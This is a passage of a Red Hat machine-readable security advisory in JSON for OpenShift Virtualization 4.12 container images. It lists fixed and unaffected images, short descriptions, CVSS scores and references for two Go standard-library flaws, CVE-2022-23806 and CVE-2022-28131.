"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2053429"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the elliptic package of the crypto library in golang when the IsOnCurve function could return true for invalid field elements. This flaw allows an attacker to take advantage of this undefined behavior, affecting the availability and integrity of the resource.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: crypto/elliptic: IsOnCurve returns true for invalid field elements",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Enterprise Linux 8 and 9 are affected because the code-base is affected by this vulnerability.\n\nRed Hat Product Security has rated this issue as having a Moderate security impact. The issue is not currently planned to be addressed in future updates for Red Hat Enterprise Linux 7; hence, marked as Out-of-Support-Scope. \n\nRed Hat Developer Tools - Compilers (go-toolset-1.16 \u0026 1.17), will not be addressed in future updates as shipped only in RHEL-7, hence, marked as Out-of-Support-Scope.\n\nFor additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle \u0026 Updates Policy: https://access.redhat.com/support/policy/updates/errata/.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64"
],
"known_not_affected": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-23806"
},
{
"category": "external",
"summary": "RHBZ#2053429",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2053429"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-23806",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23806"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-23806",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23806"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ",
"url": "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ"
}
],
"release_date": "2022-02-11T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-01-25T11:11:29+00:00",
"details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:0408"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: crypto/elliptic: IsOnCurve returns true for invalid field elements"
},
{
"cve": "CVE-2022-28131",
"cwe": {
"id": "CWE-1325",
"name": "Improperly Controlled Sequential Memory Allocation"
},
"discovery_date": "2022-07-14T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2107390"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in golang encoding/xml. When calling Decoder, Skip while parsing a deeply nested XML document, a panic can occur due to stack exhaustion and allows an attacker to impact system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: encoding/xml: stack exhaustion in Decoder.Skip",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64"
],
"known_not_affected": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
